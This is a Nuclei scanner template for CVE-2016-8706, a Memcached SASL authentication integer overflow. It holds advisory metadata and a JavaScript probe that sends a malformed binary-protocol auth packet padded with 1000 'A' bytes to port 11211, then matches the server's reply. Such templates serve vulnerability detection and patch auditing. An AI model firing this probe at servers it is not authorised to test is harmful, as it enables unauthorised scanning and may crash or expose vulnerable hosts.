2023-10-30 08:06:00 +00:00
id: CVE-2016-8706
info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in the process_bin_sasl_auth function in Memcached, which handles authentication commands of the Memcached binary protocol, can be abused to cause a heap overflow and lead to remote code execution.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.91612
    epss-percentile: 0.9865
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    verified: true
  tags: cve,cve2016,rce,js,memcached
javascript:
  - code: |
      // Build the probe: binary-protocol request magic (0x80) and the SASL Auth opcode (0x21)
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      // Send the probe over TCP; the reply read here is what the matchers evaluate
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"
      - type: word
        words:
          - "Auth failure"
        negative: true
# digest: 490a004630440220679c0fed3309ef12d46db2927b7aa6d9934c5b2ce37560aa32edd8145bcb3176022019a2e1bc0a2ffec8ad9b0f617f906a74d520ea7dd8c53dccebc8ab03a57549dc:922c64590222798bb761d5b6d8e72950